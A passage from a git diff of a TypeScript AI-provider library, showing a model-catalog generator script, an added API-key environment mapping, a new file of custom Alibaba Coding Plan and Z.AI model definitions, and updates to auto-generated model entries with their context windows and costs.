(!providers[model.provider]) { + providers[model.provider] = {}; + } + // Use model ID as key to automatically deduplicate + // Only add if not already present (models.dev takes priority over OpenRouter) + if (!providers[model.provider][model.id]) { + providers[model.provider][model.id] = model; + } + } + + // Generate TypeScript file + let output = `// This file is auto-generated by scripts/generate-models.ts +// Do not edit manually - run 'npm run generate-models' to update + +import type { Model } from "./types.js"; + +export const MODELS = { +`; + + // Generate provider sections (sorted for deterministic output) + const sortedProviderIds = Object.keys(providers).sort(); + for (const providerId of sortedProviderIds) { + const models = providers[providerId]; + output += `\t${JSON.stringify(providerId)}: {\n`; + + const sortedModelIds = Object.keys(models).sort(); + for (const modelId of sortedModelIds) { + const model = models[modelId]; + output += `\t\t"${model.id}": {\n`; + output += `\t\t\tid: "${model.id}",\n`; + output += `\t\t\tname: "${model.name}",\n`; + output += `\t\t\tapi: "${model.api}",\n`; + output += `\t\t\tprovider: "${model.provider}",\n`; + if (model.baseUrl !== undefined) { + output += `\t\t\tbaseUrl: "${model.baseUrl}",\n`; + } + if (model.headers) { + output += `\t\t\theaders: ${JSON.stringify(model.headers)},\n`; + } + if (model.compat) { + output += ` compat: ${JSON.stringify(model.compat)}, +`; + } + output += `\t\t\treasoning: ${model.reasoning},\n`; + output += `\t\t\tinput: [${model.input.map(i => `"${i}"`).join(", ")}],\n`; + output += `\t\t\tcost: {\n`; + output += `\t\t\t\tinput: ${model.cost.input},\n`; + output += `\t\t\t\toutput: ${model.cost.output},\n`; + output += `\t\t\t\tcacheRead: ${model.cost.cacheRead},\n`; + output += `\t\t\t\tcacheWrite: ${model.cost.cacheWrite},\n`; + output += `\t\t\t},\n`; + output += `\t\t\tcontextWindow: ${model.contextWindow},\n`; + output += `\t\t\tmaxTokens: ${model.maxTokens},\n`; + output += `\t\t} satisfies Model<"${model.api}">,\n`; + } + + output += `\t},\n`; + } + + output += `} as const; +`; + + // Write file + writeFileSync(join(packageRoot, "src/models.generated.ts"), output); + console.log("Generated src/models.generated.ts"); + + // Print statistics + const totalModels = allModels.length; + const reasoningModels = allModels.filter(m => m.reasoning).length; + + console.log(`\nModel Statistics:`); + console.log(` Total tool-capable models: ${totalModels}`); + console.log(` Reasoning-capable models: ${reasoningModels}`); + + for (const [provider, models] of Object.entries(providers)) { + console.log(` ${provider}: ${Object.keys(models).length} models`); + } +} + +// Run the generator +generateModels().catch(console.error); diff --git a/packages/pi-ai/src/env-api-keys.ts b/packages/pi-ai/src/env-api-keys.ts index b6577d99d..1036c4b28 100644 --- a/packages/pi-ai/src/env-api-keys.ts +++ b/packages/pi-ai/src/env-api-keys.ts @@ -137,6 +137,7 @@ export function getEnvApiKey(provider: any): string | undefined { "opencode-go": "OPENCODE_API_KEY", "kimi-coding": "KIMI_API_KEY", "alibaba-coding-plan": "ALIBABA_API_KEY", + ollama: "OLLAMA_API_KEY", "ollama-cloud": "OLLAMA_API_KEY", "custom-openai": "CUSTOM_OPENAI_API_KEY", }; diff --git a/packages/pi-ai/src/index.ts b/packages/pi-ai/src/index.ts index a75aaf7f4..c8d9e1e8c 100644 --- a/packages/pi-ai/src/index.ts +++ b/packages/pi-ai/src/index.ts @@ -27,4 +27,5 @@ export type { } from "./utils/oauth/types.js"; export * from "./utils/overflow.js"; export * from "./utils/typebox-helpers.js"; +export * from "./utils/repair-tool-json.js"; export * from "./utils/validation.js"; diff --git a/packages/pi-ai/src/models.custom.ts b/packages/pi-ai/src/models.custom.ts new file mode 100644 index 000000000..c3cc5ac04 --- /dev/null +++ b/packages/pi-ai/src/models.custom.ts @@ -0,0 +1,197 @@ +// Manually-maintained model definitions for providers NOT tracked by models.dev. +// +// The auto-generated file (models.generated.ts) is rebuilt from the models.dev +// third-party catalog. Providers that use proprietary endpoints and are not +// listed on models.dev must be defined here so they survive regeneration. +// +// See: https://github.com/gsd-build/gsd-2/issues/2339 +// +// To add a custom provider: +// 1. Add its model definitions below following the existing pattern. +// 2. Add its API key mapping to env-api-keys.ts. +// 3. Add its provider name to KnownProvider in types.ts (if not already there). + +import type { Model } from "./types.js"; + +export const CUSTOM_MODELS = { + // ─── Alibaba Coding Plan ───────────────────────────────────────────── + // Direct Alibaba DashScope Coding Plan endpoint (OpenAI-compatible). + // NOT the same as alibaba/* models on OpenRouter — different endpoint & auth. + // Original PR: #295 | Fixes: #1003, #1055, #1057 + "alibaba-coding-plan": { + "qwen3.5-plus": { + id: "qwen3.5-plus", + name: "Qwen3.5 Plus", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 983616, + maxTokens: 65536, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "qwen3-max-2026-01-23": { + id: "qwen3-max-2026-01-23", + name: "Qwen3 Max 2026-01-23", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 258048, + maxTokens: 32768, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "qwen3-coder-next": { + id: "qwen3-coder-next", + name: "Qwen3 Coder Next", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: false, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 65536, + compat: { supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "qwen3-coder-plus": { + id: "qwen3-coder-plus", + name: "Qwen3 Coder Plus", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: false, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 997952, + maxTokens: 65536, + compat: { supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "MiniMax-M2.5": { + id: "MiniMax-M2.5", + name: "MiniMax M2.5", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 196608, + maxTokens: 65536, + compat: { + supportsStore: false, + supportsDeveloperRole: false, + supportsReasoningEffort: true, + maxTokensField: "max_tokens", + }, + } satisfies Model<"openai-completions">, + "glm-5": { + id: "glm-5", + name: "GLM-5", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 202752, + maxTokens: 16384, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "glm-4.7": { + id: "glm-4.7", + name: "GLM-4.7", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 169984, + maxTokens: 16384, + compat: { thinkingFormat: "qwen", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + "kimi-k2.5": { + id: "kimi-k2.5", + name: "Kimi K2.5", + api: "openai-completions", + provider: "alibaba-coding-plan", + baseUrl: "https://coding-intl.dashscope.aliyuncs.com/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 258048, + maxTokens: 32768, + compat: { thinkingFormat: "zai", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + }, + + // ─── Z.AI (GLM-5.1) ──────────────────────────────────────────────── + // GLM-5.1 is the latest GLM model from Zhipu AI, not yet in models.dev. + // Uses the Z.AI Coding Plan endpoint (OpenAI-compatible). + // Ref: https://docs.z.ai/devpack/using5.1 + "zai": { + "glm-5.1": { + id: "glm-5.1", + name: "GLM-5.1", + api: "openai-completions", + provider: "zai", + baseUrl: "https://api.z.ai/api/coding/paas/v4", + reasoning: true, + input: ["text"], + cost: { + input: 1, + output: 3.2, + cacheRead: 0.2, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 131072, + compat: { thinkingFormat: "zai", supportsDeveloperRole: false }, + } satisfies Model<"openai-completions">, + }, +} as const; diff --git a/packages/pi-ai/src/models.generated.ts b/packages/pi-ai/src/models.generated.ts index ac56d2069..e62965533 100644 --- a/packages/pi-ai/src/models.generated.ts +++ b/packages/pi-ai/src/models.generated.ts @@ -90,40 +90,6 @@ export const MODELS = { contextWindow: 300000, maxTokens: 8192, } satisfies Model<"bedrock-converse-stream">, - "amazon.titan-text-express-v1": { - id: "amazon.titan-text-express-v1", - name: "Titan Text G1 - Express", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 0.2, - output: 0.6, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, - "amazon.titan-text-express-v1:0:8k": { - id: "amazon.titan-text-express-v1:0:8k", - name: "Titan Text G1 - Express", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 0.2, - output: 0.6, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, "anthropic.claude-3-5-haiku-20241022-v1:0": { id: "anthropic.claude-3-5-haiku-20241022-v1:0", name: "Claude Haiku 3.5", @@ -209,40 +175,6 @@ export const MODELS = { contextWindow: 200000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, - "anthropic.claude-3-opus-20240229-v1:0": { - id: "anthropic.claude-3-opus-20240229-v1:0", - name: "Claude Opus 3", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 200000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, - "anthropic.claude-3-sonnet-20240229-v1:0": { - id: "anthropic.claude-3-sonnet-20240229-v1:0", - name: "Claude Sonnet 3", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 200000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, "anthropic.claude-haiku-4-5-20251001-v1:0": { id: "anthropic.claude-haiku-4-5-20251001-v1:0", name: "Claude Haiku 4.5", @@ -325,7 +257,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "anthropic.claude-sonnet-4-20250514-v1:0": { @@ -376,43 +308,9 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, - "cohere.command-r-plus-v1:0": { - id: "cohere.command-r-plus-v1:0", - name: "Command R+", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 3, - output: 15, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, - "cohere.command-r-v1:0": { - id: "cohere.command-r-v1:0", - name: "Command R", - api: "bedrock-converse-stream", - provider: "amazon-bedrock", - baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", - reasoning: false, - input: ["text"], - cost: { - input: 0.5, - output: 1.5, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 128000, - maxTokens: 4096, - } satisfies Model<"bedrock-converse-stream">, "deepseek.r1-v1:0": { id: "deepseek.r1-v1:0", name: "DeepSeek-R1", @@ -447,8 +345,8 @@ export const MODELS = { contextWindow: 163840, maxTokens: 81920, } satisfies Model<"bedrock-converse-stream">, - "deepseek.v3.2-v1:0": { - id: "deepseek.v3.2-v1:0", + "deepseek.v3.2": { + id: "deepseek.v3.2", name: "DeepSeek-V3.2", api: "bedrock-converse-stream", provider: "amazon-bedrock", @@ -512,7 +410,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "eu.anthropic.claude-sonnet-4-20250514-v1:0": { @@ -563,7 +461,7 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, "global.anthropic.claude-haiku-4-5-20251001-v1:0": { @@ -614,7 +512,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "global.anthropic.claude-sonnet-4-20250514-v1:0": { @@ -665,7 +563,7 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, "google.gemma-3-27b-it": { @@ -702,6 +600,23 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, + "meta.llama3-1-405b-instruct-v1:0": { + id: "meta.llama3-1-405b-instruct-v1:0", + name: "Llama 3.1 405B Instruct", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text"], + cost: { + input: 2.4, + output: 2.4, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 4096, + } satisfies Model<"bedrock-converse-stream">, "meta.llama3-1-70b-instruct-v1:0": { id: "meta.llama3-1-70b-instruct-v1:0", name: "Llama 3.1 70B Instruct", @@ -889,6 +804,40 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"bedrock-converse-stream">, + "mistral.devstral-2-123b": { + id: "mistral.devstral-2-123b", + name: "Devstral 2 123B", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text"], + cost: { + input: 0.4, + output: 2, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 8192, + } satisfies Model<"bedrock-converse-stream">, + "mistral.magistral-small-2509": { + id: "mistral.magistral-small-2509", + name: "Magistral Small 1.2", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.5, + output: 1.5, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 40000, + } satisfies Model<"bedrock-converse-stream">, "mistral.ministral-3-14b-instruct": { id: "mistral.ministral-3-14b-instruct", name: "Ministral 14B 3.0", @@ -906,6 +855,23 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, + "mistral.ministral-3-3b-instruct": { + id: "mistral.ministral-3-3b-instruct", + name: "Ministral 3 3B", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text", "image"], + cost: { + input: 0.1, + output: 0.1, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 8192, + } satisfies Model<"bedrock-converse-stream">, "mistral.ministral-3-8b-instruct": { id: "mistral.ministral-3-8b-instruct", name: "Ministral 3 8B", @@ -923,22 +889,39 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, - "mistral.mistral-large-2402-v1:0": { - id: "mistral.mistral-large-2402-v1:0", - name: "Mistral Large (24.02)", + "mistral.mistral-large-3-675b-instruct": { + id: "mistral.mistral-large-3-675b-instruct", + name: "Mistral Large 3", api: "bedrock-converse-stream", provider: "amazon-bedrock", baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", reasoning: false, - input: ["text"], + input: ["text", "image"], cost: { input: 0.5, output: 1.5, cacheRead: 0, cacheWrite: 0, }, + contextWindow: 256000, + maxTokens: 8192, + } satisfies Model<"bedrock-converse-stream">, + "mistral.pixtral-large-2502-v1:0": { + id: "mistral.pixtral-large-2502-v1:0", + name: "Pixtral Large (25.02)", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: false, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0, + cacheWrite: 0, + }, contextWindow: 128000, - maxTokens: 4096, + maxTokens: 8192, } satisfies Model<"bedrock-converse-stream">, "mistral.voxtral-mini-3b-2507": { id: "mistral.voxtral-mini-3b-2507", @@ -1025,6 +1008,23 @@ export const MODELS = { contextWindow: 128000, maxTokens: 4096, } satisfies Model<"bedrock-converse-stream">, + "nvidia.nemotron-nano-3-30b": { + id: "nvidia.nemotron-nano-3-30b", + name: "NVIDIA Nemotron Nano 3 30B", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: true, + input: ["text"], + cost: { + input: 0.06, + output: 0.24, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 4096, + } satisfies Model<"bedrock-converse-stream">, "nvidia.nemotron-nano-9b-v2": { id: "nvidia.nemotron-nano-9b-v2", name: "NVIDIA Nemotron Nano 9B v2", @@ -1294,7 +1294,7 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"bedrock-converse-stream">, "us.anthropic.claude-sonnet-4-20250514-v1:0": { @@ -1345,7 +1345,7 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"bedrock-converse-stream">, "writer.palmyra-x4-v1:0": { @@ -1721,23 +1721,6 @@ export const MODELS = { cacheRead: 0.5, cacheWrite: 6.25, }, - contextWindow: 200000, - maxTokens: 128000, - } satisfies Model<"anthropic-messages">, - "claude-opus-4-6[1m]": { - id: "claude-opus-4-6[1m]", - name: "Claude Opus 4.6 (1M)", - api: "anthropic-messages", - provider: "anthropic", - baseUrl: "https://api.anthropic.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 5, - output: 25, - cacheRead: 0.5, - cacheWrite: 6.25, - }, contextWindow: 1000000, maxTokens: 128000, } satisfies Model<"anthropic-messages">, @@ -1823,182 +1806,10 @@ export const MODELS = { cacheRead: 0.3, cacheWrite: 3.75, }, - contextWindow: 200000, + contextWindow: 1000000, maxTokens: 64000, } satisfies Model<"anthropic-messages">, }, - "anthropic-vertex": { - "claude-opus-4-6": { - id: "claude-opus-4-6", - name: "Claude Opus 4.6 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 128000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4-6[1m]": { - id: "claude-opus-4-6[1m]", - name: "Claude Opus 4.6 1M (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 1000000, - maxTokens: 128000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4-6": { - id: "claude-sonnet-4-6", - name: "Claude Sonnet 4.6 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 200000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4-6[1m]": { - id: "claude-sonnet-4-6[1m]", - name: "Claude Sonnet 4.6 1M (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 1000000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4-5@20250929": { - id: "claude-sonnet-4-5@20250929", - name: "Claude Sonnet 4.5 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 200000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-sonnet-4@20250514": { - id: "claude-sonnet-4@20250514", - name: "Claude Sonnet 4 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 3, - output: 15, - cacheRead: 0.3, - cacheWrite: 3.75, - }, - contextWindow: 200000, - maxTokens: 64000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4-5@20251101": { - id: "claude-opus-4-5@20251101", - name: "Claude Opus 4.5 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 32000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4-1@20250805": { - id: "claude-opus-4-1@20250805", - name: "Claude Opus 4.1 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 32000, - } satisfies Model<"anthropic-vertex">, - "claude-opus-4@20250514": { - id: "claude-opus-4@20250514", - name: "Claude Opus 4 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: true, - input: ["text", "image"], - cost: { - input: 15, - output: 75, - cacheRead: 1.5, - cacheWrite: 18.75, - }, - contextWindow: 200000, - maxTokens: 32000, - } satisfies Model<"anthropic-vertex">, - "claude-haiku-4-5@20251001": { - id: "claude-haiku-4-5@20251001", - name: "Claude Haiku 4.5 (Vertex)", - api: "anthropic-vertex", - provider: "anthropic-vertex", - baseUrl: "https://us-central1-aiplatform.googleapis.com", - reasoning: false, - input: ["text", "image"], - cost: { - input: 0.8, - output: 4, - cacheRead: 0.08, - cacheWrite: 1, - }, - contextWindow: 200000, - maxTokens: 8192, - } satisfies Model<"anthropic-vertex">, - }, "azure-openai-responses": { "codex-mini-latest": { id: "codex-mini-latest", @@ -2493,6 +2304,40 @@ export const MODELS = { contextWindow: 272000, maxTokens: 128000, } satisfies Model<"azure-openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 mini", + api: "azure-openai-responses", + provider: "azure-openai-responses", + baseUrl: "", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"azure-openai-responses">, + "gpt-5.4-nano": { + id: "gpt-5.4-nano", + name: "GPT-5.4 nano", + api: "azure-openai-responses", + provider: "azure-openai-responses", + baseUrl: "", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.2, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"azure-openai-responses">, "gpt-5.4-pro": { id: "gpt-5.4-pro", name: "GPT-5.4 Pro", @@ -2733,7 +2578,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 144000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "claude-opus-4.5": { @@ -2751,7 +2596,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 160000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "claude-opus-4.6": { @@ -2769,7 +2614,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 144000, maxTokens: 64000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4": { @@ -2787,7 +2632,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 216000, maxTokens: 16000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4.5": { @@ -2805,7 +2650,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 144000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "claude-sonnet-4.6": { @@ -2823,7 +2668,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 200000, maxTokens: 32000, } satisfies Model<"anthropic-messages">, "gemini-2.5-pro": { @@ -2918,7 +2763,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 64000, + contextWindow: 128000, maxTokens: 16384, } satisfies Model<"openai-completions">, "gpt-4o": { @@ -2937,8 +2782,8 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 64000, - maxTokens: 16384, + contextWindow: 128000, + maxTokens: 4096, } satisfies Model<"openai-completions">, "gpt-5": { id: "gpt-5", @@ -2973,7 +2818,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 264000, maxTokens: 64000, } satisfies Model<"openai-responses">, "gpt-5.1": { @@ -2991,7 +2836,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 264000, maxTokens: 64000, } satisfies Model<"openai-responses">, "gpt-5.1-codex": { @@ -3009,7 +2854,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.1-codex-max": { @@ -3027,7 +2872,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.1-codex-mini": { @@ -3045,7 +2890,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.2": { @@ -3063,7 +2908,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, + contextWindow: 264000, maxTokens: 64000, } satisfies Model<"openai-responses">, "gpt-5.2-codex": { @@ -3081,7 +2926,7 @@ export const MODELS = { cacheRead: 0, cacheWrite: 0, }, - contextWindow: 272000, + contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, "gpt-5.3-codex": { @@ -3120,6 +2965,24 @@ export const MODELS = { contextWindow: 400000, maxTokens: 128000, } satisfies Model<"openai-responses">, + "gpt-5.4-mini": { + id: "gpt-5.4-mini", + name: "GPT-5.4 mini", + api: "openai-responses", + provider: "github-copilot", + baseUrl: "https://api.individual.githubcopilot.com", + headers: {"User-Agent":"GitHubCopilotChat/0.35.0","Editor-Version":"vscode/1.107.0","Editor-Plugin-Version":"copilot-chat/0.35.0","Copilot-Integration-Id":"vscode-chat"}, + reasoning: true, + input: ["text", "image"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-responses">, "grok-code-fast-1": { id: "grok-code-fast-1", name: "Grok Code Fast 1", @@ -3439,10 +3302,10 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, + input: 0.25, + output: 1.5, + cacheRead: 0.025, + cacheWrite: 1, }, contextWindow: 1048576, maxTokens: 65536, @@ -4703,6 +4566,40 @@ export const MODELS = { contextWindow: 204800, maxTokens: 131072, } satisfies Model<"anthropic-messages">, + "MiniMax-M2.7": { + id: "MiniMax-M2.7", + name: "MiniMax-M2.7", + api: "anthropic-messages", + provider: "minimax", + baseUrl: "https://api.minimax.io/anthropic", + reasoning: true, + input: ["text"], 